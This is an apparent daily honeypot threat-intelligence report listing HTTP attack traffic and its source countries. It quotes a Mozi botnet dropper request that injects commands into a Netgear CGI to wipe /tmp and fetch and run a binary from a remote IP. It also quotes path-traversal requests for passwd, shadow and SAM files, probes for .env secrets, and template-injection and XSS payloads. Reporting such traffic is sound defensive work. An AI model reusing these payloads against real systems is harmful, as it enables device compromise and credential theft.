Daily Report: 2025-06-05#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).
There are 47 new requests that have never been observed before (these were added to the monitored request database.).
A total of 6611 requests were recorded during the day, originating from 1 different countries, with a peak of 5484 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
US | Dubai |
US | Israel |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
117.200.201.56 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.200.201.56:57955/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
263 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/php.ini HTTP/1.1 |
310 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1 |
575 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Csystem32\x5Cconfig\x5CSAM HTTP/1.1 |
883 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fvar/log/nginx/access.log HTTP/1.1 |
900 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/hostname HTTP/1.1 |
948 | 2 | GET /api/teams/1/members HTTP/1.1 |
1024 | 2 | GET /cgi-bin/luci/ HTTP/1.1 |
1037 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 |
1107 | 2 | GET /template?code={{ self }} HTTP/1.1 |
1615 | 2 | GET /ws-broker?action=PATCH&target=/users/1/settings HTTP/1.1 |
1698 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/hosts HTTP/1.1 |
1775 | 2 | GET /.idea/workspace.xml HTTP/1.1 |
1871 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2froot/.bash_history HTTP/1.1 |
2389 | 2 | GET /track?referrer=javascript:alert(document.domain) HTTP/1.1 |
2393 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow HTTP/1.1 |
2569 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fproc/self/environ HTTP/1.1 |
2609 | 2 | GET /test/template HTTP/1.1 |
2781 | 2 | GET /../../boot.ini HTTP/1.1 |
2804 | 2 | GET /jwt-decode HTTP/1.1 |
2847 | 1 | GET /.env.bak.2 HTTP/1.1 |
2878 | 1 | GET /.env-snapshot.tar.gz HTTP/1.1 |
2892 | 1 | GET /.env-db-credentials HTTP/1.1 |
2895 | 1 | GET /.env-docker HTTP/1.1 |
2896 | 1 | GET /.env-nginx HTTP/1.1 |
2897 | 1 | GET /.env-aws.env HTTP/1.1 |
2898 | 1 | GET /.env_cookie-settings HTTP/1.1 |
2899 | 1 | GET /.env-status HTTP/1.1 |
2900 | 1 | GET /.env-staging-vars HTTP/1.1 |
2901 | 1 | GET /.env-runner HTTP/1.1 |
2903 | 1 | GET /.env-reverse-proxy HTTP/1.1 |
2904 | 1 | GET /.env.job HTTP/1.1 |
2905 | 1 | GET /.env-copy HTTP/1.1 |
2920 | 1 | GET /assets/js/config.js HTTP/1.1 |
2923 | 1 | GET /js/env.js HTTP/1.1 |
2924 | 1 | GET /static/env.js HTTP/1.1 |
2933 | 1 | GET /api/admin HTTP/1.1 |
2934 | 1 | GET /api/dev HTTP/1.1 |
2948 | 1 | GET /.git/refs HTTP/1.1 |
2955 | 1 | GET /.env-tracking.log HTTP/1.1 |
2969 | 1 | GET /.env_secrets HTTP/1.1 |
2970 | 1 | GET /.env_auth HTTP/1.1 |
2971 | 1 | GET /.env_config HTTP/1.1 |
2984 | 1 | GET /config/configuration.yml HTTP/1.1 |
2985 | 1 | GET /config/databases.yml HTTP/1.1 |
2987 | 1 | GET /_fragment?_path=what=-1&_controller=phpinfo&_hash=PJKZTykFk9HjPoH4H6ZxRbyJs0b5lS70K1bzuuO1Lg4= HTTP/1.1 |
2988 | 1 | GET /mailer.ini HTTP/1.1 |
2995 | 1 | GET /ALFA_DATA/alfacgiapi HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 5484 | GB |
1 | 477 | US |
2 | 221 | BG |
3 | 64 | DE |
4 | 58 | JP |
5 | 46 | NL |
6 | 38 | CA |
7 | 33 | CN |
8 | 21 | SC |
9 | 21 | NG |
10 | 20 | HK |
11 | 18 | PL |
12 | 13 | GH |
13 | 12 | IN |
14 | 9 | KR |
15 | 7 | PT |
16 | 7 | VN |
17 | 7 | AO |
18 | 5 | FR |
19 | 5 | SG |
20 | 5 | RU |
21 | 4 | CH |
22 | 4 | IL |
23 | 4 | UA |
24 | 3 | ID |
25 | 3 | ES |
26 | 3 | TW |
27 | 3 | KZ |
28 | 2 | IT |
29 | 2 | BR |
30 | 2 | LT |
31 | 2 | BE |
32 | 2 | TH |
33 | 2 | BO |
34 | 1 | PA |
35 | 1 | SE |
36 | 1 | AR |
37 | 1 | IE |